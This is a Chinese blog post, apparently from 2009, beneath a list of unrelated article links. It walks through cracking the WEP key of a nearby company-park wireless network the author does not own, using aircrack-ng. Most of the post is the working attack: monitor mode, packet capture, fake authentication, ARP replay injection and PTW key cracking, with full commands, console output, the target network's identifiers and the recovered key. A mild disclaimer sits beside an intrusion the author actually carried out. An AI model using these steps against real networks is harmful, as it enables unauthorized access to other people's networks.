- 1vscode快捷键_vscode注释快捷键
- 2【AWVS】漏洞扫描工具 AWVS 安装与使用教学
- 3Qt:设置背景图片的三种方式(setAutoFillBackground)_qt setautofillbackground
- 4window下部署redis集群出现问题总结_redis cluster-node-timeout
- 5JavaEE和Tomcat环境
- 6网上怎么赚钱?看懂这些你就不愁赚不到钱!
- 72024土木工程结构与公共交通国际会议
- 8果断收藏!看过的最棒的一篇对Transformer的理解,适合基础少的小白
- 9stm32智能小车设计(1)——硬件选型思路_tt电机和直流减速电机区别
- 10低代码技术的深度应用:物资管理的创新与效率提升
[大家上才是真的上] 使用无线蹭网工口物aircrack-ng分享互联网
赞
踩
公司木有无线网络, 所以自从入手E63开始就觊觎园区的无线了. 网上找了找linux下比较流行的工具是aircrack-ng ,很好很强大.
看了扶凯桑给的一个实例, 不过和俺用的攻击方式不一. 官网上资料充足, 下面memo一下过程,仅供参考, 不推荐恶意实践.
使用的机器是改装EEEPC, UBUNTU8.10, 前提是安装aircrack-ng(apt-get简单入手).
1 设置网卡为监听模式
gladstone@gladstone-eeepc:~$ sudo airmon-ng start wlan0
2 寻找目标AP(Access Point)
gladstone@gladstone-eeepc:~$ sudo airodump-ng mon0
会出现一个列表,列出可用的无线网络, 这里找到目标路由器的bssid为00:B0:0C:02:A7:DE, 而ifconfig得到本机的mac地址是00:15:af:a6:c8:d7
3 开始收集信息
gladstone@gladstone-eeepc:~$ sudo airodump-ng -c 1 --bssid 00:B0:0C:02:A7:DE -w out-ag mon0
需要注意的是参数
–c 是目标AP所在的频道, 这里是1
--bssid 输入目标AP的mac地址
-w 是写入到文件的前缀定义,这里设定为out-ag 的话,真正的输出文件会是out-ag-01.cap
控制台输出:
CH 1 ][ Elapsed: 4 mins ][ 2009-06-03 09:55 ][ fixed channel mon0: 7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:B0:0C:02:A7:DE 155 12 1033 19059 19 1 54 WEP WEP OPN wanrongtouzi
BSSID STATION PWR Rate Lost Packets Probes
00:B0:0C:02:A7:DE 00:B0:C6:00:46:1F 163 18- 2 0 24 wanrongtouzi 00:B0:0C:02:A7:DE 00:15:AF:A6:C8:D7 0 0- 0 157795 88998
注意这个终端不要关掉,在整个破解过程中都要开着以收集信息.
4 开始进行攻击
攻击使用的是aireplay-ng 工具,这个工具通过参数可以设定攻击方法(具体见aireplay-ng --help), 扶凯桑用的是chopchop, 这里用arp
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
这里一开始遇到问题, 控制台收到如下信息
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
这个问题在官网wiki上有详细描述: http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
解决办法就是在执行上述命令之前先进行认证:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -1 0 -a 00:B0:0C:02:A7:DE -e wanrongtouzi -h 00:15:af:a6:c8:d7 mon0
09:51:26 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
09:51:28 Sending Authentication Request (Open System)
09:51:28 Authentication successful
09:51:28 Sending Association Request
09:51:33 Sending Authentication Request (Open System)
09:51:33 Authentication successful
09:51:33 Sending Association Request
09:51:33 Association successful :-) (AID: 1)
然后再重新开始攻击:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
09:52:00 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
Saving ARP requests in replay_arp-0603-095200.cap
You should also start airodump-ng to capture replies.
^Cad 108414 packets (got 56293 ARP requests and 44578 ACKs), sent 50832 packets...(499 pps)
执行完这步就开始静候,发现包的数量快速上升, 在另外一个控制台(airodump-ng)里可以观测到注入的跑的数量上升, #/s指标达到30左右(这个没有定量,官方的说法是可以达到几百, 在家里试的时候最高到了80, 可能和机器速度有关)
5 根据收集的信息破解密码
大约过2分钟就可以试着使用aircrack-ng 进行破解了,上面说到收集到的包都存在out-ag-01.cap 文件里面
gladstone@gladstone-eeepc:~$ sudo aircrack-ng out-ag-01.cap
Opening out-ag-01.cap
Read 94019 packets.
# BSSID ESSID Encryption
1 00:B0:0C:02:A7:DE wanrongtouzi WEP (17803 IVs)
Choosing first network as target.
Opening out-ag-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 17887 ivs.
Aircrack-ng 1.0 rc1
Aircrack-ng 1.0 rc1
Aircrack-ng 1.0 rc1
[00:00:01] TesteAircrack-ng 1.0 rc117823 IVs)
[00:00:03] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote) [00:00:04] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:06] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:07] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:09] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:11] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:12] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:15] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:16] Tested 1347841 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:17] Tested 1425601 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:17] Tested 3002 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504)
KB depth byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504)
0 4/ 8 AA(23296) 39(23040) 4E(23040) CE(22784) 0F(22272) 50(22272) 25(22016) 75(22016) 81(22016) E4(22016)
1 0/ 5 BB(25088) 78(24064) 5D(23808) 8D(23808) 3A(23296) BD(23040) 68(22784) 8C(22784) 3F(22528) A5(22528)
2 6/ 8 A1(23296) 31(23040) 4F(23040) C8(23040) D5(23040) DC(22784) 2D(22528) 78(22528) 3D(22272) 5B(22272)
3 0/ 10 DD(23808) 12(23296) A8(23040) C0(23040) 1F(22528) 25(22528) DB(22272) F3(22272) 00(22272) 56(22272)
4 0/ 1 FF(31488) E5(24320) 29(23552) 3C(23552) 40(23552) 49(23296) F8(23296) 47(23040) 60(23040) C1(23040)
KEY FOUND! [ AA:BB:CC:DD:FF ]
Decrypted correctly: 100%
顺利得到密码, 还真是设置的够简单= _ =.
上面提到的只是简单的WEP的破解, 根据密码设置的复杂程度所用时间不一, WPA貌似很难破解, 下次再试试
